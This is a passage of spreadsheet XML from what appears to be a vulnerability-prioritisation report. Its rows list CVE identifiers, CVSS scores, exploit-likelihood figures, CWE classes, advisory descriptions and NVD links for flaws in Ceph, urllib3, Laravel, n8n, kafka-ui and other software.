      <c r="K716" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-78</t>
        </is>
      </c>
      <c r="L716"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M716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87911</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-30156</t>
        </is>
      </c>
      <c r="C717" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E717" s="5" t="inlineStr"/>
      <c r="F717" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G717" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L717" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the CephX authentication protocol encrypts tickets with AES-128-CBC in an unauthenticated mode that uses a hard-coded initialization vector and no message authentication, allowing an attacker to forge credentials and gain cluster-wide access. Because the ciphertext is malleable and the monitor will encrypt attacker-chosen entity names, an attacker holding one low-privilege key and able to observe CephX traffic can use the monitor as an encryption oracle and splice ciphertext blocks into valid tickets for privileged entities such as Manager, MDS, and OSD. The same lack of authentication also lets an attacker with CephX permissions escalate privileges by flipping a single bit in a service ticket to set its allow_all field to true. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="M717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-30156</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21441</t>
        </is>
      </c>
      <c r="C718" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E718" s="5" t="inlineStr"/>
      <c r="F718" s="5" t="n">
        <v>0.03</v>
      </c>
      <c r="G718" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H718" s="5" t="inlineStr">
        <is>
          <t>python:urllib3</t>
        </is>
      </c>
      <c r="I718" s="5" t="inlineStr">
        <is>
          <t>2026-01-07</t>
        </is>
      </c>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L718" s="5" t="inlineStr">
        <is>
          <t>urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted source.</t>
        </is>
      </c>
      <c r="M718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21441</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30864</t>
        </is>
      </c>
      <c r="C719" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E719" s="5" t="inlineStr"/>
      <c r="F719" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="inlineStr"/>
      <c r="I719" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L719" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, iTop is vulnerable to Reflected Cross-Site Scripting (XSS) in the dashboard revert functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30864</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44432</t>
        </is>
      </c>
      <c r="C720" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E720" s="5" t="inlineStr"/>
      <c r="F720" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G720" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H720" s="5" t="inlineStr">
        <is>
          <t>python:urllib3</t>
        </is>
      </c>
      <c r="I720" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L720" s="5" t="inlineStr">
        <is>
          <t>urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0.</t>
        </is>
      </c>
      <c r="M720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44432</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47746</t>
        </is>
      </c>
      <c r="C721" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E721" s="5" t="inlineStr"/>
      <c r="F721" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="inlineStr"/>
      <c r="I721" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L721" s="5" t="inlineStr">
        <is>
          <t>Misskey is an open source, federated social media platform. Versions 12.37.0 and later, but prior to 2026.5.4, are vulnerable to timing attacks during JSON-LD signature validation and the compaction process. Because the JSON-LD parsing context is not shared between signature verification and subsequent processing, the application may trust information that should not be trusted, resulting in a time-of-check to time-of-use (TOCTOU) flaw. This allows an attacker to have fraudulent activities accepted as valid, leading to a loss of integrity. This issue has been fixed in version 2026.5.4.</t>
        </is>
      </c>
      <c r="M721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47746</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48019</t>
        </is>
      </c>
      <c r="C722" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E722" s="5" t="inlineStr"/>
      <c r="F722" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="inlineStr"/>
      <c r="I722" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L722" s="5" t="inlineStr">
        <is>
          <t>Laravel is a web application framework. Prior to versions 12.60.0 and 13.10.0, a CRLF injection vulnerability in Laravel's email validation, in combination with how Symfony Mailer and Symfony Mime handle certain character sequences, may allow an unauthenticated attacker to interfere with outbound email processing in applications that send mail to user-supplied addresses. This issue has been patched in versions 12.60.0 and 13.10.0.</t>
        </is>
      </c>
      <c r="M722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48019</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50093</t>
        </is>
      </c>
      <c r="C723" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E723" s="5" t="inlineStr"/>
      <c r="F723" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L723" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Siveillance Control Pro V3.0 (All versions &lt; V3.0.12.2173), Siveillance Control Pro V4.0 (All versions &lt; V4.0.9.2178), Siveillance Control V3.0 (All versions &lt; V3.0.22.2177), Siveillance Control V4.0 (All versions &lt; V4.0.11.2177). A vulnerability in the OIS web module allows an attacker to upload arbitrary files to the server. Successful exploitation of this vulnerability could allow an attacker to gain root access on the host system, potentially leading to a full compromise of the affected OIS environment.</t>
        </is>
      </c>
      <c r="M723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5598</t>
        </is>
      </c>
      <c r="C724" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E724" s="5" t="inlineStr"/>
      <c r="F724" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G724" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr">
        <is>
          <t>CWE-385</t>
        </is>
      </c>
      <c r="L724" s="5" t="inlineStr">
        <is>
          <t>Covert timing channel vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA core on all (core modules).
 This vulnerability is associated with program files FrodoEngine.Java.
This issue affects BC-JAVA: from 1.71 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5598</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5706</t>
        </is>
      </c>
      <c r="C725" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E725" s="5" t="inlineStr"/>
      <c r="F725" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr">
        <is>
          <t>CWE-130</t>
        </is>
      </c>
      <c r="L725" s="5" t="inlineStr">
        <is>
          <t>In Bluetooth Mesh SDK 6.1.4 and earlier, malformed extended advertisements can trigger out-of-bounds writes leading to stack corruption and remote code execution. These messages must come from a device that has already joined the network. Only provisioners supporting extended advertisements may be impacted.</t>
        </is>
      </c>
      <c r="M725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5706</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61666</t>
        </is>
      </c>
      <c r="C726" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E726" s="5" t="inlineStr"/>
      <c r="F726" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="inlineStr"/>
      <c r="I726" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L726" s="5" t="inlineStr">
        <is>
          <t>websocket-driver is a WebSocket protocol handler with pluggable I/O. Prior to 0.8.2, WebSocket::Driver.server() passes a malformed Host header to URI.parse in lib/websocket/http/request.rb without catching URI::InvalidURIError, allowing a remote client to crash a TCP-backed WebSocket server when the application does not catch the error from parse(). This issue is fixed in version 0.8.2.</t>
        </is>
      </c>
      <c r="M726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61666</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72772</t>
        </is>
      </c>
      <c r="C727" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E727" s="5" t="inlineStr"/>
      <c r="F727" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="inlineStr"/>
      <c r="I727" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="L727" s="5" t="inlineStr">
        <is>
          <t>n8n before 2.32.1 (and before 2.31.5) is vulnerable to account takeover via the Token Exchange Embed Login feature. When a validly-signed incoming token was matched to a local account by its email claim, the service did not verify that the email claim was verified, nor that the trusted key's permitted role ceiling covered that account. As a result, anyone able to obtain a token accepted by a configured trusted key (for example, a trusted issuer emitting unverified email addresses) could authenticate as any existing user and gain full account control. This issue only affects instances where the embed login feature is enabled and at least one trusted key source is configured.</t>
        </is>
      </c>
      <c r="M727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72772</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79921</t>
        </is>
      </c>
      <c r="C728" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E728" s="5" t="inlineStr"/>
      <c r="F728" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="inlineStr"/>
      <c r="I728" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L728" s="5" t="inlineStr">
        <is>
          <t>amqp091-go is a Go AMQP 0.9.1 client. Before version 1.13.0, a compromised or malicious AMQP broker can force the client to allocate resources for and process content body frames that exceed the negotiated frame_max limit. This can lead to unexpected memory consumption or application-layer denial of service (DoS), bypassing the protocol's built-in framing constraints. Version 1.13.0 contains a fix. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79921</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82866</t>
        </is>
      </c>
      <c r="C729" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E729" s="5" t="inlineStr"/>
      <c r="F729" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="inlineStr"/>
      <c r="I729" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L729" s="5" t="inlineStr">
        <is>
          <t>@pdfme/common before 5.5.10 contains a server-side request forgery vulnerability in the getB64BasePdf function that fetches arbitrary URLs without validation when basePdf is attacker-controlled. Attackers who control the basePdf template field can force servers or clients to make requests to internal endpoints, enabling metadata exfiltration, network reconnaissance, and blind request forgery attacks.</t>
        </is>
      </c>
      <c r="M729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82866</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86165</t>
        </is>
      </c>
      <c r="C730" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E730" s="5" t="inlineStr"/>
      <c r="F730" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="inlineStr"/>
      <c r="I730" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="L730" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Tenda HG10 300001138. This vulnerability affects the function formURL of the file /boaform/admin/formURL. Performing a manipulation of the argument Keywd/urlFQDN results in buffer overflow. The attack may be initiated remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86165</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-52251</t>
        </is>
      </c>
      <c r="C731" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E731" s="5" t="inlineStr"/>
      <c r="F731" s="5" t="n">
        <v>0.868</v>
      </c>
      <c r="G731" s="5" t="inlineStr">
        <is>
          <t>kafka</t>
        </is>
      </c>
      <c r="H731" s="5" t="inlineStr">
        <is>
          <t>provectus:ui</t>
        </is>
      </c>
      <c r="I731" s="5" t="inlineStr">
        <is>
          <t>2024-01-25</t>
        </is>
      </c>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L731" s="5" t="inlineStr">
        <is>
          <t>An issue discovered in provectus kafka-ui 0.4.0 through 0.7.2 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. No fixed release is available; the project has had no commit since 2024-04-08.</t>
        </is>
      </c>
      <c r="M731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-52251</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-20701</t>
        </is>
      </c>
      <c r="C732" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E732" s="5" t="inlineStr"/>
      <c r="F732" s="5" t="n">
        <v>0.078</v>
      </c>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr">
        <is>
          <t>2025-08-04</t>
        </is>
      </c>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L732" s="5" t="inlineStr">
        <is>
          <t>In the Airoha Bluetooth audio SDK, there is a possible way to pair Bluetooth audio device without user consent. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-20701</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-56798</t>
        </is>
      </c>
      <c r="C733" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E733" s="5" t="inlineStr"/>
      <c r="F733" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L733" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) vulnerability in Lime Technology, Inc.'s Unraid OS version 6.12.14 and earlier allows remote attackers to escalate privileges via the Unraid authentication cookie's lax same-site policy.</t>
        </is>
      </c>
      <c r="M733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-56798</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-67030</t>
        </is>
      </c>
      <c r="C734" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E734" s="5" t="inlineStr"/>
      <c r="F734" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr">
        <is>
          <t>codehaus-plexus:plexus-utils</t>
        </is>
      </c>
      <c r="I734" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L734" s="5" t="inlineStr">
        <is>
          <t>Directory Traversal vulnerability in the extractFile method of org.codehaus.plexus.util.Expand in plexus-utils before 6d780b3378829318ba5c2d29547e0012d5b29642. This allows an attacker to execute arbitrary code</t>
        </is>
      </c>
      <c r="M734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-67030</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70151</t>
        </is>
      </c>
      <c r="C735" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E735" s="5" t="inlineStr"/>
      <c r="F735" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr">
        <is>
          <t>fabian:scholars_tracking_system</t>
        </is>
      </c>
      <c r="I735" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L735" s="5" t="inlineStr">
        <is>
          <t>code-proje</t>
        </is>
      </c>
      <c r="M735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70151</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-9049</t>
        </is>
      </c>
      <c r="C736" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E736" s="5" t="inlineStr"/>
      <c r="F736" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L736" s="5" t="inlineStr">
        <is>
          <t>The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'nokri_account_member_permissions' function in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add new Subscriber users with employer account member permissions, who in turn can escalate privileges by updating the email address of any user, including Administrator users.</t>
        </is>
      </c>
      <c r="M736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-9049</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12648</t>
        </is>
      </c>
      <c r="C737" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E737" s="5" t="inlineStr"/>
      <c r="F737" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="inlineStr"/>
      <c r="I737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L737" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
